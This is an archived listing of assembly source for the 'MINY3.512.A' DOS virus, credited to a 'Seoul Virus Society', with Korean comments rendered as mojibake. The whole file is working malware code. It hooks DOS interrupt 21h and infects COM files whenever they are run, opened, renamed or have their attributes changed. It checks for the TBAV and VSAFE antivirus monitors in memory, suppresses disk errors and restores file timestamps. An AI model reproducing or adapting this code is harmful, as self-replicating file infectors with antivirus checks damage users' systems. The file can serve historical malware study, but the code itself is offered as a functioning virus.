home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / KOREACOL.ZIP / MINY.ZIP / MINY3.ZIP / MY3-512.ASM < prev    next >
Assembly Source File  |  1996-08-12  |  10KB  |  316 lines
  1. ;******************************************************************************
  2. ;
  3. ;         MINY3.512.A Virus
  4. ;
  5. ;     ╣A╕b: ¼ß╢ë ña╖í£ß»a ╡e╨s                           ╣A╕b: 1995æe 02╢⌐ 28╖⌐
  6. ;           Seoul Virus Society
  7. ;
  8. ;******************************************************************************
  9.  
  10.  
  11.      VIRUS SEGMENT PARA 'VIRUS'
  12.               ASSUME CS:VIRUS, DS:VIRUS
  13.  
  14.  Entry:   mov     SI,100h                    ; BP=ña╖í£ß»a »í╕b ║ü¡íêt
  15.           NOP
  16.           JMP     ChkVirinMEM                ; £æ ¼w║ü ╠a╦a¥í ╕±╧a
  17.           NOP
  18.  NewInt21:       ; ¼ü¥í╢à 21h ñσ ╖Ñ╚ߣ≤╦a
  19.           PushF
  20.           NOP
  21.           cmp     ah,4Bh                      ; »⌐╨ù╖Ñêa?
  22.           NOP
  23.           jz      InfectFile                  ; ╠a╖⌐ êq╡q ╤í┬ë
  24.  ChkAH:   cmp     ah,3Dh                      ; ╡í╧e ╖Ñêa?
  25.           jz      InfectFile
  26.           cmp     ah,43h                      ; ¡ó¼≈
  27.           jz      InfectFile
  28.           cmp     ah,56h                      ; ╠a╖⌐ ╖íƒq ñaÄüïí
  29.           jz      InfectFile
  30.           cmp     ah,6Ch                      ; 5.0 ╡A¼ß ªü╚ß ┬üêaûE ╡í╧e
  31.           jz      InfectFile
  32.           cmp     ah,41h
  33.           jz      InfectFile
  34.  ChkAHF0: cmp     AX,0F036h                   ; £æ ¼w║ü ╡aªü ê±¼a╖Ñêa?
  35.           jnz     OrgInt21
  36.           PopF
  37.           xor     ax,ax                       ; áx╖aíe 0000╖i ò⌐¥a║æ
  38.           IRET
  39.  OrgInt21:                                   ; ╢Ñ£ü int 21¥í ╕±╧a
  40.           NOP
  41.           PopF
  42.           db      0EAh
  43.  OldInt21 dd ?
  44.  
  45.  C_OldInt21:
  46.           NOP
  47.           xchg    ah,al
  48.           PushF
  49.           call    dword ptr CS:[OldInt21]
  50.           RET
  51.  
  52. ;------------------------------------------------------------------
  53. ;
  54.  InfectFile:
  55.           Push    AX                         ; ¥A╗í»a╚ß ╕ß╕w
  56.           Push    BX
  57.           Push    CX
  58.           Push    DX
  59.           Push    DS
  60.           Push    ES
  61.           Push    SI
  62.           Push    DI
  63.           NOP
  64.           cmp     ah,6ch                     ; ¼ü¥í╢à ╡í╧e ñw»ó╖Ñêa?
  65.           NOP
  66.           jz      Chk_EXTisCOM
  67.           mov     si,dx                      ; SI= ╠a╖⌐ »í╕b╢ß├í
  68.  
  69.  Chk_EXTisCOM:
  70.           lodsb                              ; DS:[SI] -> AL
  71.           cmp     al,00                      ; ╠a╖⌐ Å{╖Ñêa?
  72.           jz      JumpExit
  73.           cmp     al,'V'                     ; ╠a╖⌐ ╖íƒq╡A V ╕a ╖╢ôeê⌡ ╣A╢A
  74.           jz      JumpExit
  75.           cmp     al,'.'                     ; ╤┬╕w╕a èüÑi?
  76.           jnz     Chk_EXTisCOM
  77.           lodsw
  78.           cmp     ax,'OC'
  79.           jnz     JumpExit
  80.           lodsb
  81.           cmp     al,'M'
  82.           jz      SetInt24h
  83.  JumpExit:
  84.           Jmp     PopRES                     ; COM ╖í ┤aôííe ╣A╢A
  85.  
  86.  SetInt24h:
  87.           mov     bx,ds                      ; Int 24h ƒi └a╗í╨eöa.
  88.           xor     ax,ax
  89.           mov     ds,ax
  90.           Push    DS:[0090h]
  91.           Push    DS:[0092h]
  92.           mov     word ptr DS:[0090h],offset NewInt24
  93.           mov     word ptr DS:[0092h],cs
  94.  
  95.           mov     ds,bx
  96.           mov     ax,0043h                   ; ¡ó¼≈ ┤Φïí
  97.           call    C_OldInt21
  98.           Push    CX
  99.           Push    DX
  100.           Push    DS
  101.  
  102.           MOV     AX,0143h                   ; ╖¬ïí/│aïí ¡ó¼≈╖a¥í ñaÄæ
  103.           xor     cx,cx
  104.           call    C_OldInt21
  105.           jnc     Open_File
  106.  J_SET:   JMP     SetOrgAttr
  107.  Open_File:
  108.           NOP
  109.           mov     ax,023dh                   ; ╠a╖⌐ ╡í╧e ╨aïí
  110.           call    C_OldInt21
  111.           jc      J_SET
  112.  
  113.           push    cs
  114.           pop     ds
  115.           Push    cs
  116.           pop     es
  117.           xchg    bx,ax                      ; ╨àùi ┤Φïí
  118.  
  119.  Read_File:
  120.           mov     ah,3Fh                     ; ╖¬┤ß ùi╖íïí
  121.           mov     dx,offset Org4bytes
  122.           mov     si,dx
  123.           mov     cx,0004h
  124.           int     21h
  125.  ChkEXEFile:
  126.           mov     AX,word ptr DS:[SI]        ; EXE ╠a╖⌐╖Ñ╗í ê±¼a
  127.           cmp     AX,'ZM'                    ; 'MZ'
  128.           jz      Close_File
  129.           cmp     ax,'MZ'                    ; 'ZM'
  130.           jz      Close_file
  131.  ChkFSize:
  132.           mov     al,byte ptr ds:[SI+3]      ; êq╡q ╡aªü ╤┬╖Ñ
  133.           xor     al,36h
  134.           cmp     Al,ds:[SI+2]
  135.           jz      Close_File
  136.  
  137.           mov     di,offset V3_Str           ; V3 ╖Ñ╗í ê±¼a
  138.           mov     cx,0004
  139.           repz    cmpsb
  140.           jz      Close_file
  141.  
  142.           mov     al,02h                     ; ╠a╖⌐╖ü ╣A╖⌐ ûߥí
  143.           call    AH42h
  144.           cmp     ax,1234                    ; 1234 Ñíöa ╕b╖eêa?
  145.           jb      Close_File
  146.           cmp     ax,63210                   ; 64321 Ñíöa ╟eêa?
  147.           ja      Close_File
  148.  
  149.           Push    AX                         ; ╢ß├í╗í╕≈
  150.           add     AX,0100h
  151.           mov     word ptr DS:[Entry+1],AX
  152.           Pop     AX
  153.           sub     ax,0003
  154.           mov     word ptr ds:[FileHead+1],ax
  155.           mov     al,byte ptr ds:[FileHead+2] ; êq╡q ╡aªü
  156.           xor     al,036h
  157.           mov     byte ptr ds:[FileHead+3],al
  158.  
  159.           mov     ax,5700h                   ; Éi╝a/»íêe ┤Φïí
  160.           Int     21h
  161.           Push    CX
  162.           Push    DX
  163.  
  164.           mov     al,40h                     ; ña╖í£ß»a │aïí
  165.           xor     dx,dx
  166.           mov     cx, offset End_Virus
  167.           call    C_OldInt21
  168.  
  169.           mov     al,00h                     ; ╠a╖⌐╖ü └ß╖q╖a¥í ╖íò╖
  170.           call    AH42h
  171.  
  172.           mov     al,40h                     ; ña╖í£ß»a │aïí
  173.           mov     dx, offset FileHead
  174.           mov     cx,0004h
  175.           call    C_OldInt21
  176.  
  177.           Pop     dx                         ; ╢Ñ£ü Éi╝a¥í ñaÄüïí
  178.           Pop     CX
  179.           mov     ax,5701h
  180.           Int     21h
  181.  Close_File:                                 ; ╠a╖⌐ öhïí
  182.           mov     ah,3eh
  183.           Int     21h
  184.  
  185.  SetOrgAttr:
  186.           Pop     DS                         ; ╢Ñ£ü ¡ó¼≈╖a¥í ñaÄüïí
  187.           Pop     DX
  188.           pop     CX
  189.           mov     ax,0143h
  190.           Call    C_OldInt21
  191.  
  192.           xor     ax,ax                      ; Int 24h Ñóèü
  193.           mov     ds,ax
  194.           POP     DS:[0092h]
  195.           POP     DS:[0090h]
  196.  PopRES:
  197.           Pop     DI                         ; ╢Ñ£ü ¥A╗í»a╚ß Ñóèü
  198.           Pop     si
  199.           Pop     ES
  200.           Pop     ds
  201.           Pop     dx
  202.           Pop     cx
  203.           Pop     bx
  204.           Pop     ax
  205.           Jmp     OrgInt21
  206.  
  207. ;-------------------------------------------------------------------
  208. ;    £æ ¼w║ü ªüªà
  209. ;    òí»a╖ü ┬A¼w╢ß╡A ¼w║ü╨eöa.
  210.  
  211.  ChkVirinMEM:
  212.           xor     AX,AX                      ; F-PROT ╖ü ╗Ñöe ïíôw╖i
  213.  A_F:     nop                                ; óü¥b╤┴»í╟Ñöa.
  214.           inc     AX
  215.           NOp
  216.           cmp     AX,1111h
  217.           jnz     A_F
  218.           NOP
  219.           mov     dx,si
  220.           mov     ax,3521h                   ; ES:BX
  221.           NOP
  222.           Int     21h
  223.           cmp     word ptr ES:[000Ah],'BT'   ; ES:000A ╡A TBDRVX êa ╖╢╖aíe
  224.           jnz     ChkVSAFE                   ; TBAV ╡üñw╢w╖í ╖╢ôeê⌡╖íöa.
  225.           cmp     word ptr ES:[000Ch],'RD'
  226.           jz      Already_MEM                ; £æ╡A TBAV êa ╣Ñ╕ü╨eöa.
  227.  ChkVSAFE:
  228.           cmp     byte ptr ES:[BX],0EAh      ; £æ╡A VSAFE êa ╣Ñ╕ü╨eöa.
  229.           jnz     ChkVirinM
  230.           cmp     word ptr ES:[BX+5],80FBh   ;
  231.           jnz     ChkVirinM
  232.           jmp     Already_MEM
  233.  ChkVirinM:
  234.           mov     ax,36F0h                   ; AX=F035h/Int 21h»í
  235.           xchg    ah,al                      ;
  236.           Int     21h                        ;
  237.           or      ax,ax                      ;
  238.           jz      Already_MEM                ; £æ╡A ╣Ñ╕ü╨aôeêa?
  239.  
  240.           mov     word ptr DS:[OldInt21+SI],BX        ; Int 21h ║ü¡í ╕ß╕w
  241.           Mov     word ptr DS:[OldInt21+2+SI],ES
  242.  
  243.           NOP
  244.           NOP
  245.           Push    cs
  246.           Pop     AX
  247.  
  248.           mov     CX,(offset Tend_virus - SEGORG +15 ) SHR 4 ;└a╗í╨i £æ ╟aïí
  249.           dec     ax
  250.           NOP
  251.           mov     ds,ax                      ; MCB (Memory Control Block)
  252.           mov     BX,0001
  253.           NOP
  254.           cmp     byte ptr DS:[BX-1],'Z'     ; áa╗íáb ºi£Γ╖Ñêa?
  255.           jnz     Already_MEM
  256.           NOP
  257.           sub     word ptr DS:[BX+02],CX     ; áa╗íáb ¡Aïaáσ╦a ëü¼e
  258.           NOP
  259.           sub     word ptr DS:[BX+11h],CX    ; òí»aêa ¼a╢w╨i ╢w£╖ ║ë╖▒
  260.           NOP
  261.           mov     ES,word ptr DS:[BX+11h]    ;
  262.           NOP
  263.           Push    cs                         ; CS=DS
  264.           Pop     ds
  265.  
  266.           mov     si,DX                      ; ña╖í£ß»a Ñó¼a
  267.           xor     di,di                      ; IP=0000 ªü╚ß ╣Ñ╕ü╨eöa.
  268.           mov     cx, offset TEnd_Virus      ; ña╖í£ß»a ï⌐╖í
  269.           NOP
  270.           repz    movsb                      ; Ñó¼a
  271.           NOP
  272.           mov     ds,cx                      ; CX=0000
  273.           cli                                ;
  274.           mov     word ptr ds:[BX+85h],es    ; BX=0001
  275.           mov     word ptr ds:[BX+83h],offset NewInt21
  276.           sti
  277.  
  278.  Already_Mem:
  279.           mov     si,DX                      ; SI ôe ña╖í£ß»a »í╕b╢ß├í
  280.           push    cs                         ; cs=ds
  281.           pop     ds
  282.           push    cs                         ; ds=es
  283.           pop     es
  284.  
  285.  Re_COM:          ; COM ╠a╖⌐ »⌐╨ù╨aïí
  286.           add     si,offset Org4bytes        ; ╢Ñ£ü òA╖í╚ß╖ü êt èü╨aïí
  287.           mov     di,00FFh
  288.           Inc     di                         ; └ß╖q╖ü 4 ña╖í╦a Ñóèü
  289.           push    di
  290.           movsw
  291.           movsw
  292.           xor     ax,ax
  293.           RET                                ; »a╚é╡A 100h êa ╕ß╕w
  294.  
  295.  Org4bytes        db 90h,90h,0cdh,20h         ; ╢Ñ£ü 4 ña╖í╦a╖ü êt
  296.  
  297.  Ah42h:   xor     dx,dx
  298.           xor     cx,cx
  299.           mov     ah,42h
  300.           Int     21h
  301.           RET
  302.  
  303.  NewInt24:        ; ╡A£ßêa Éa╗í ┤gëA╨eöa.
  304.           XOR     AL,AL
  305.           IRET
  306.  
  307.           db      '[Miny3]'                  ; ña╖í£ß»a ╖íƒq
  308.  V3_Str   db      0EBh,13h,73h,43h           ; V3 ╠a╖⌐ ╕a₧a
  309.  FileHead db      0E9h
  310.  End_VIRUS:
  311.           db      ?,?,?
  312.  TEnd_VIRUS:
  313.  
  314.    Virus  EndS
  315.     End  Entry
  316.